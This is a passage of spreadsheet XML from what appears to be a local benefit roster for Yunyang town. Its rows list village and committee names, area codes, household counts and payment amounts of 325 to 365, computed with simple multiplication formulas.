      <c r="G1539" s="17">
        <v>1</v>
      </c>
      <c r="H1539" s="18">
        <v>365</v>
      </c>
      <c r="I1539" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1539" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1539" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1540" customHeight="1" spans="1:11">
      <c r="A1540" s="16" t="s">
        <v>4129</v>
      </c>
      <c r="B1540" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1540" s="17" t="s">
        <v>4004</v>
      </c>
      <c r="D1540" s="17" t="s">
        <v>4130</v>
      </c>
      <c r="E1540" s="17" t="s">
        <v>4131</v>
      </c>
      <c r="F1540" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1540" s="17">
        <v>1</v>
      </c>
      <c r="H1540" s="18">
        <v>365</v>
      </c>
      <c r="I1540" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1540" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1540" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1541" customHeight="1" spans="1:11">
      <c r="A1541" s="16" t="s">
        <v>4132</v>
      </c>
      <c r="B1541" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1541" s="17" t="s">
        <v>3561</v>
      </c>
      <c r="D1541" s="17" t="s">
        <v>4133</v>
      </c>
      <c r="E1541" s="17" t="s">
        <v>3852</v>
      </c>
      <c r="F1541" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1541" s="17">
        <v>1</v>
      </c>
      <c r="H1541" s="18">
        <v>365</v>
      </c>
      <c r="I1541" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1541" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1541" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1542" customHeight="1" spans="1:11">
      <c r="A1542" s="16" t="s">
        <v>4134</v>
      </c>
      <c r="B1542" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1542" s="17" t="s">
        <v>4112</v>
      </c>
      <c r="D1542" s="17" t="s">
        <v>4135</v>
      </c>
      <c r="E1542" s="17" t="s">
        <v>4136</v>
      </c>
      <c r="F1542" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1542" s="17">
        <v>1</v>
      </c>
      <c r="H1542" s="18">
        <v>365</v>
      </c>
      <c r="I1542" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1542" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1542" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1543" customHeight="1" spans="1:11">
      <c r="A1543" s="16" t="s">
        <v>4137</v>
      </c>
      <c r="B1543" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1543" s="17" t="s">
        <v>4112</v>
      </c>
      <c r="D1543" s="17" t="s">
        <v>4138</v>
      </c>
      <c r="E1543" s="17" t="s">
        <v>4139</v>
      </c>
      <c r="F1543" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1543" s="17">
        <v>1</v>
      </c>
      <c r="H1543" s="18">
        <v>365</v>
      </c>
      <c r="I1543" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1543" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1543" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1544" customHeight="1" spans="1:11">
      <c r="A1544" s="16" t="s">
        <v>4140</v>
      </c>
      <c r="B1544" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1544" s="17" t="s">
        <v>3997</v>
      </c>
      <c r="D1544" s="17" t="s">
        <v>4141</v>
      </c>
      <c r="E1544" s="17" t="s">
        <v>3614</v>
      </c>
      <c r="F1544" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1544" s="17">
        <v>1</v>
      </c>
      <c r="H1544" s="18">
        <v>365</v>
      </c>
      <c r="I1544" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1544" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1544" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1545" customHeight="1" spans="1:11">
      <c r="A1545" s="16" t="s">
        <v>4142</v>
      </c>
      <c r="B1545" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1545" s="17" t="s">
        <v>3997</v>
      </c>
      <c r="D1545" s="17" t="s">
        <v>4143</v>
      </c>
      <c r="E1545" s="17" t="s">
        <v>4144</v>
      </c>
      <c r="F1545" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1545" s="17">
        <v>1</v>
      </c>
      <c r="H1545" s="18">
        <v>365</v>
      </c>
      <c r="I1545" s="17">
        <f t="shared" si="81"/>
        <v>365</v>
      </c>
      <c r="J1545" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1545" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1546" customHeight="1" spans="1:11">
      <c r="A1546" s="16" t="s">
        <v>4145</v>
      </c>
      <c r="B1546" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1546" s="17" t="s">
        <v>3997</v>
      </c>
      <c r="D1546" s="17" t="s">
        <v>4146</v>
      </c>
      <c r="E1546" s="17" t="s">
        <v>4147</v>
      </c>
      <c r="F1546" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1546" s="17">
        <v>2</v>
      </c>
      <c r="H1546" s="18">
        <v>325</v>
      </c>
      <c r="I1546" s="17">
        <f t="shared" si="81"/>
        <v>650</v>
      </c>
      <c r="J1546" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1546" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1547" customHeight="1" spans="1:11">
      <c r="A1547" s="16" t="s">
        <v>4148</v>
      </c>
      <c r="B1547" s="17" t="str">
        <f>B1546</f>
        <v>云阳镇</v>
      </c>
      <c r="C1547" s="17" t="str">
        <f>C1546</f>
        <v>云阳小关</v>
      </c>
      <c r="D1547" s="16" t="s">
        <v>4149</v>
      </c>
      <c r="E1547" s="16" t="s">
        <v>2500</v>
      </c>
      <c r="F1547" s="17" t="str">
        <f>F1546</f>
        <v>4113210521</v>
      </c>
      <c r="G1547" s="17"/>
      <c r="H1547" s="17"/>
      <c r="I1547" s="17"/>
      <c r="J1547" s="17"/>
      <c r="K1547" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1548" customHeight="1" spans="1:11">
      <c r="A1548" s="16" t="s">
        <v>4150</v>
      </c>
      <c r="B1548" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1548" s="17" t="s">
        <v>4151</v>
      </c>
      <c r="D1548" s="17" t="s">
        <v>4152</v>
      </c>
      <c r="E1548" s="17" t="s">
        <v>3868</v>
      </c>
      <c r="F1548" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1548" s="17">
        <v>1</v>
      </c>
      <c r="H1548" s="18">
        <v>365</v>
      </c>
      <c r="I1548" s="17">
        <f t="shared" ref="I1548:I1561" si="82">H1548*G1548</f>
        <v>365</v>
      </c>
      <c r="J1548" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1548" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1549" customHeight="1" spans="1:11">
      <c r="A1549" s="16" t="s">
        <v>4153</v>
      </c>
      <c r="B1549" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1549" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="D1549" s="17" t="s">
        <v>4154</v>
      </c>
      <c r="E1549" s="17" t="s">
        <v>3763</v>
      </c>
      <c r="F1549" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1549" s="17">
        <v>1</v>
      </c>
      <c r="H1549" s="18">
        <v>365</v>
      </c>
      <c r="I1549" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1549" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1549" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1550" customHeight="1" spans="1:11">
      <c r="A1550" s="16" t="s">
        <v>4155</v>
      </c>
      <c r="B1550" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1550" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="D1550" s="17" t="s">
        <v>4156</v>
      </c>
      <c r="E1550" s="17" t="s">
        <v>3979</v>
      </c>
      <c r="F1550" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1550" s="17">
        <v>1</v>
      </c>
      <c r="H1550" s="18">
        <v>365</v>
      </c>
      <c r="I1550" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1550" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1550" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1551" customHeight="1" spans="1:11">
      <c r="A1551" s="16" t="s">
        <v>4157</v>
      </c>
      <c r="B1551" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1551" s="17" t="s">
        <v>4000</v>
      </c>
      <c r="D1551" s="17" t="s">
        <v>4158</v>
      </c>
      <c r="E1551" s="17" t="s">
        <v>4159</v>
      </c>
      <c r="F1551" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1551" s="17">
        <v>1</v>
      </c>
      <c r="H1551" s="18">
        <v>365</v>
      </c>
      <c r="I1551" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1551" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1551" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1552" customHeight="1" spans="1:11">
      <c r="A1552" s="16" t="s">
        <v>4160</v>
      </c>
      <c r="B1552" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1552" s="17" t="s">
        <v>3831</v>
      </c>
      <c r="D1552" s="17" t="s">
        <v>4161</v>
      </c>
      <c r="E1552" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1552" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1552" s="17">
        <v>1</v>
      </c>
      <c r="H1552" s="18">
        <v>365</v>
      </c>
      <c r="I1552" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1552" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1552" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1553" customHeight="1" spans="1:11">
      <c r="A1553" s="16" t="s">
        <v>4162</v>
      </c>
      <c r="B1553" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1553" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1553" s="17" t="s">
        <v>4164</v>
      </c>
      <c r="E1553" s="17" t="s">
        <v>4165</v>
      </c>
      <c r="F1553" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1553" s="17">
        <v>1</v>
      </c>
      <c r="H1553" s="18">
        <v>365</v>
      </c>
      <c r="I1553" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1553" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1553" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1554" customHeight="1" spans="1:11">
      <c r="A1554" s="16" t="s">
        <v>4166</v>
      </c>
      <c r="B1554" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1554" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1554" s="17" t="s">
        <v>4167</v>
      </c>
      <c r="E1554" s="17" t="s">
        <v>3643</v>
      </c>
      <c r="F1554" s="17" t="s">
        <v>4168</v>
      </c>
      <c r="G1554" s="17">
        <v>1</v>
      </c>
      <c r="H1554" s="17">
        <v>335</v>
      </c>
      <c r="I1554" s="17">
        <f t="shared" si="82"/>
        <v>335</v>
      </c>
      <c r="J1554" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1554" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1555" customHeight="1" spans="1:11">
      <c r="A1555" s="16" t="s">
        <v>4169</v>
      </c>
      <c r="B1555" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1555" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1555" s="17" t="s">
        <v>4170</v>
      </c>
      <c r="E1555" s="17" t="s">
        <v>3651</v>
      </c>
      <c r="F1555" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1555" s="17">
        <v>1</v>
      </c>
      <c r="H1555" s="18">
        <v>365</v>
      </c>
      <c r="I1555" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1555" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1555" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1556" customHeight="1" spans="1:11">
      <c r="A1556" s="16" t="s">
        <v>4171</v>
      </c>
      <c r="B1556" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1556" s="17" t="s">
        <v>4172</v>
      </c>
      <c r="D1556" s="17" t="s">
        <v>4173</v>
      </c>
      <c r="E1556" s="17" t="s">
        <v>4174</v>
      </c>
      <c r="F1556" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1556" s="17">
        <v>1</v>
      </c>
      <c r="H1556" s="18">
        <v>365</v>
      </c>
      <c r="I1556" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1556" s="17">
        <v>45017</v>
      </c>
      <c r="K1556" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1557" customHeight="1" spans="1:11">
      <c r="A1557" s="16" t="s">
        <v>4175</v>
      </c>
      <c r="B1557" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1557" s="17" t="s">
        <v>3659</v>
      </c>
      <c r="D1557" s="17" t="s">
        <v>4176</v>
      </c>
      <c r="E1557" s="17" t="s">
        <v>3945</v>
      </c>
      <c r="F1557" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1557" s="17">
        <v>1</v>
      </c>
      <c r="H1557" s="18">
        <v>365</v>
      </c>
      <c r="I1557" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1557" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1557" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1558" customHeight="1" spans="1:11">
      <c r="A1558" s="16" t="s">
        <v>4177</v>
      </c>
      <c r="B1558" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1558" s="17" t="s">
        <v>4178</v>
      </c>
      <c r="D1558" s="17" t="s">
        <v>4179</v>
      </c>
      <c r="E1558" s="17" t="s">
        <v>3624</v>
      </c>
      <c r="F1558" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1558" s="17">
        <v>1</v>
      </c>
      <c r="H1558" s="18">
        <v>365</v>
      </c>
      <c r="I1558" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1558" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1558" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1559" customHeight="1" spans="1:11">
      <c r="A1559" s="16" t="s">
        <v>4180</v>
      </c>
      <c r="B1559" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1559" s="17" t="s">
        <v>4181</v>
      </c>
      <c r="D1559" s="17" t="s">
        <v>4182</v>
      </c>
      <c r="E1559" s="17" t="s">
        <v>4183</v>
      </c>
      <c r="F1559" s="17" t="s">
        <v>4184</v>
      </c>
      <c r="G1559" s="17">
        <v>1</v>
      </c>
      <c r="H1559" s="18">
        <v>365</v>
      </c>
      <c r="I1559" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1559" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1559" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1560" customHeight="1" spans="1:11">
      <c r="A1560" s="16" t="s">
        <v>4186</v>
      </c>
      <c r="B1560" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1560" s="17" t="s">
        <v>4181</v>
      </c>
      <c r="D1560" s="17" t="s">
        <v>4187</v>
      </c>
      <c r="E1560" s="17" t="s">
        <v>3604</v>
      </c>
      <c r="F1560" s="17" t="s">
        <v>4184</v>
      </c>
      <c r="G1560" s="17">
        <v>1</v>
      </c>
      <c r="H1560" s="18">
        <v>365</v>
      </c>
      <c r="I1560" s="17">
        <f t="shared" si="82"/>
        <v>365</v>
      </c>
      <c r="J1560" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1560" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1561" customHeight="1" spans="1:11">
      <c r="A1561" s="16" t="s">
        <v>4188</v>
      </c>
      <c r="B1561" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1561" s="17" t="s">
        <v>4181</v>
      </c>
      <c r="D1561" s="17" t="s">
        <v>4189</v>
      </c>
      <c r="E1561" s="17" t="s">
        <v>2572</v>
      </c>
      <c r="F1561" s="17" t="s">
        <v>4184</v>
      </c>
      <c r="G1561" s="17">
        <v>2</v>
      </c>
      <c r="H1561" s="18">
        <v>325</v>
      </c>
      <c r="I1561" s="17">
        <f t="shared" si="82"/>
        <v>650</v>
      </c>
      <c r="J1561" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1561" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1562" customHeight="1" spans="1:11">
      <c r="A1562" s="16" t="s">
        <v>4190</v>
      </c>
      <c r="B1562" s="17" t="str">
        <f>B1561</f>
        <v>云阳镇</v>
      </c>
      <c r="C1562" s="17" t="str">
        <f>C1561</f>
        <v>西关居委会</v>
      </c>
      <c r="D1562" s="16" t="s">
        <v>4191</v>
      </c>
      <c r="E1562" s="16" t="s">
        <v>4192</v>
      </c>
      <c r="F1562" s="17" t="str">
        <f>F1561</f>
        <v>4113210524</v>
      </c>
      <c r="G1562" s="17"/>
      <c r="H1562" s="17"/>
      <c r="I1562" s="17"/>
      <c r="J1562" s="17"/>
      <c r="K1562" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1563" customHeight="1" spans="1:11">
      <c r="A1563" s="16" t="s">
        <v>4193</v>
      </c>
      <c r="B1563" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1563" s="17" t="s">
        <v>4194</v>
      </c>
      <c r="D1563" s="17" t="s">
        <v>4195</v>
      </c>
      <c r="E1563" s="17" t="s">
        <v>3506</v>
      </c>
      <c r="F1563" s="17" t="s">
        <v>4196</v>
      </c>
      <c r="G1563" s="17">
        <v>1</v>
      </c>
      <c r="H1563" s="18">
        <v>365</v>
      </c>
      <c r="I1563" s="17">
        <f>H1563*G1563</f>
        <v>365</v>
      </c>
      <c r="J1563" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1563" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1564" customHeight="1" spans="1:11">
      <c r="A1564" s="16" t="s">
        <v>4197</v>
      </c>
      <c r="B1564" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1564" s="17" t="s">
        <v>4198</v>
      </c>
      <c r="D1564" s="17" t="s">
        <v>3038</v>
      </c>
      <c r="E1564" s="17" t="s">
        <v>4199</v>
      </c>
      <c r="F1564" s="17" t="s">
        <v>4196</v>
      </c>
      <c r="G1564" s="17">
        <v>2</v>
      </c>
      <c r="H1564" s="18">
        <v>325</v>
      </c>
      <c r="I1564" s="17">
        <f>H1564*G1564</f>
        <v>650</v>
      </c>
      <c r="J1564" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1564" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1565" customHeight="1" spans="1:11">
      <c r="A1565" s="16" t="s">
        <v>4200</v>
      </c>
      <c r="B1565" s="17" t="str">
        <f>B1564</f>
        <v>云阳镇</v>
      </c>
      <c r="C1565" s="17" t="str">
        <f>C1564</f>
        <v>狮子坟三里店</v>
      </c>
      <c r="D1565" s="16" t="s">
        <v>4201</v>
      </c>
      <c r="E1565" s="16" t="s">
        <v>4202</v>
      </c>
      <c r="F1565" s="17" t="str">
        <f>F1564</f>
        <v>4113210508</v>
      </c>
      <c r="G1565" s="17"/>
      <c r="H1565" s="17"/>
      <c r="I1565" s="17"/>
      <c r="J1565" s="17"/>
      <c r="K1565" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1566" customHeight="1" spans="1:11">
      <c r="A1566" s="16" t="s">
        <v>4203</v>
      </c>
      <c r="B1566" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1566" s="17" t="s">
        <v>4204</v>
      </c>
      <c r="D1566" s="17" t="s">
        <v>4205</v>
      </c>
      <c r="E1566" s="17" t="s">
        <v>4206</v>
      </c>
      <c r="F1566" s="17" t="s">
        <v>4196</v>
      </c>
      <c r="G1566" s="17">
        <v>1</v>
      </c>
      <c r="H1566" s="18">
        <v>365</v>
      </c>
      <c r="I1566" s="17">
        <f>H1566*G1566</f>
        <v>365</v>
      </c>
      <c r="J1566" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1566" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1567" customHeight="1" spans="1:11">
      <c r="A1567" s="16" t="s">
        <v>4207</v>
      </c>
      <c r="B1567" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1567" s="17" t="s">
        <v>4208</v>
      </c>
      <c r="D1567" s="17" t="s">
        <v>4209</v>
      </c>
      <c r="E1567" s="17" t="s">
        <v>4210</v>
      </c>
      <c r="F1567" s="17" t="s">
        <v>4211</v>
      </c>
      <c r="G1567" s="17">
        <v>2</v>
      </c>
      <c r="H1567" s="18">
        <v>325</v>
      </c>
      <c r="I1567" s="17">
        <f>H1567*G1567</f>
        <v>650</v>
      </c>
      <c r="J1567" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1567" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1568" customHeight="1" spans="1:11">
      <c r="A1568" s="16" t="s">
        <v>4212</v>
      </c>
      <c r="B1568" s="17" t="str">
        <f>B1567</f>
        <v>云阳镇</v>
      </c>
      <c r="C1568" s="17" t="str">
        <f>C1567</f>
        <v>杨岗村</v>
      </c>
      <c r="D1568" s="23" t="s">
        <v>4213</v>
      </c>
      <c r="E1568" s="23" t="s">
        <v>4214</v>
      </c>
      <c r="F1568" s="17" t="str">
        <f>F1567</f>
        <v>4113210516</v>
      </c>
      <c r="G1568" s="17"/>
      <c r="H1568" s="17"/>
      <c r="I1568" s="17"/>
      <c r="J1568" s="17"/>
      <c r="K1568" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1569" customHeight="1" spans="1:11">
      <c r="A1569" s="16" t="s">
        <v>4215</v>
      </c>
      <c r="B1569" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1569" s="17" t="s">
        <v>4216</v>
      </c>
      <c r="D1569" s="17" t="s">
        <v>4217</v>
      </c>
      <c r="E1569" s="17" t="s">
        <v>4218</v>
      </c>
      <c r="F1569" s="17" t="s">
        <v>4219</v>
      </c>
      <c r="G1569" s="17">
        <v>1</v>
      </c>
      <c r="H1569" s="18">
        <v>365</v>
      </c>
      <c r="I1569" s="17">
        <f t="shared" ref="I1569:I1578" si="83">H1569*G1569</f>
        <v>365</v>
      </c>
      <c r="J1569" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1569" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1570" customHeight="1" spans="1:11">
      <c r="A1570" s="16" t="s">
        <v>4220</v>
      </c>
      <c r="B1570" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1570" s="17" t="s">
        <v>4216</v>
      </c>
      <c r="D1570" s="17" t="s">
        <v>4221</v>
      </c>
      <c r="E1570" s="17" t="s">
        <v>4222</v>
      </c>
      <c r="F1570" s="17" t="s">
        <v>4168</v>
      </c>
      <c r="G1570" s="17">
        <v>1</v>
      </c>
      <c r="H1570" s="17">
        <v>335</v>
      </c>
      <c r="I1570" s="17">
        <f t="shared" si="83"/>
        <v>335</v>
      </c>
      <c r="J1570" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1570" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1571" customHeight="1" spans="1:11">
      <c r="A1571" s="16" t="s">
        <v>4223</v>
      </c>
      <c r="B1571" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1571" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1571" s="17" t="s">
        <v>4225</v>
      </c>
      <c r="E1571" s="17" t="s">
        <v>3699</v>
      </c>
      <c r="F1571" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1571" s="17">
        <v>1</v>
      </c>
      <c r="H1571" s="18">
        <v>365</v>
      </c>
      <c r="I1571" s="17">
        <f t="shared" si="83"/>
        <v>365</v>
      </c>
      <c r="J1571" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1571" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1572" customHeight="1" spans="1:11">
      <c r="A1572" s="16" t="s">
        <v>4226</v>
      </c>
      <c r="B1572" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1572" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1572" s="17" t="s">
        <v>4227</v>
      </c>
      <c r="E1572" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1572" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1572" s="17">
        <v>1</v>
      </c>
      <c r="H1572" s="18">
        <v>365</v>
      </c>
      <c r="I1572" s="17">
        <f t="shared" si="83"/>
        <v>365</v>
      </c>
      <c r="J1572" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1572" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1573" customHeight="1" spans="1:11">
      <c r="A1573" s="16" t="s">
        <v>4228</v>
      </c>
      <c r="B1573" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1573" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1573" s="17" t="s">
        <v>4229</v>
      </c>
      <c r="E1573" s="17" t="s">
        <v>2572</v>
      </c>
      <c r="F1573" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1573" s="17">
        <v>1</v>
      </c>
      <c r="H1573" s="18">
        <v>365</v>
      </c>
      <c r="I1573" s="17">
        <f t="shared" si="83"/>
        <v>365</v>
      </c>
      <c r="J1573" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1573" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1574" customHeight="1" spans="1:11">
      <c r="A1574" s="16" t="s">
        <v>4230</v>
      </c>
      <c r="B1574" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1574" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1574" s="17" t="s">
        <v>4231</v>
      </c>
      <c r="E1574" s="17" t="s">
        <v>4232</v>
      </c>
      <c r="F1574" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1574" s="17">
        <v>1</v>
      </c>
      <c r="H1574" s="18">
        <v>365</v>
      </c>
      <c r="I1574" s="17">
        <f t="shared" si="83"/>
        <v>365</v>
      </c>
      <c r="J1574" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1574" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1575" customHeight="1" spans="1:11">
      <c r="A1575" s="16" t="s">
        <v>4233</v>
      </c>
      <c r="B1575" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1575" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1575" s="17" t="s">
        <v>4234</v>
      </c>
      <c r="E1575" s="17" t="s">
        <v>4235</v>
      </c>
      <c r="F1575" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1575" s="17">
        <v>1</v>
      </c>
      <c r="H1575" s="18">
        <v>365</v>
      </c>
      <c r="I1575" s="17">
        <f t="shared" si="83"/>
        <v>365</v>
      </c>
      <c r="J1575" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1575" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1576" customHeight="1" spans="1:11">
      <c r="A1576" s="16" t="s">
        <v>4236</v>
      </c>
      <c r="B1576" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1576" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1576" s="17" t="s">
        <v>4237</v>
      </c>
      <c r="E1576" s="17" t="s">
        <v>4238</v>
      </c>
      <c r="F1576" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1576" s="17">
        <v>1</v>
      </c>
      <c r="H1576" s="18">
        <v>365</v>
      </c>
      <c r="I1576" s="17">
        <f t="shared" si="83"/>
        <v>365</v>
      </c>
      <c r="J1576" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1576" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1577" customHeight="1" spans="1:11">
      <c r="A1577" s="16" t="s">
        <v>4239</v>
      </c>
      <c r="B1577" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1577" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1577" s="17" t="s">
        <v>4240</v>
      </c>
      <c r="E1577" s="17" t="s">
        <v>3601</v>
      </c>
      <c r="F1577" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1577" s="17">
        <v>1</v>
      </c>
      <c r="H1577" s="18">
        <v>365</v>
      </c>
      <c r="I1577" s="17">
        <f t="shared" si="83"/>
        <v>365</v>
      </c>
      <c r="J1577" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1577" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1578" customHeight="1" spans="1:11">
      <c r="A1578" s="16" t="s">
        <v>4241</v>
      </c>
      <c r="B1578" s="17" t="s">
        <v>3560</v>
      </c>
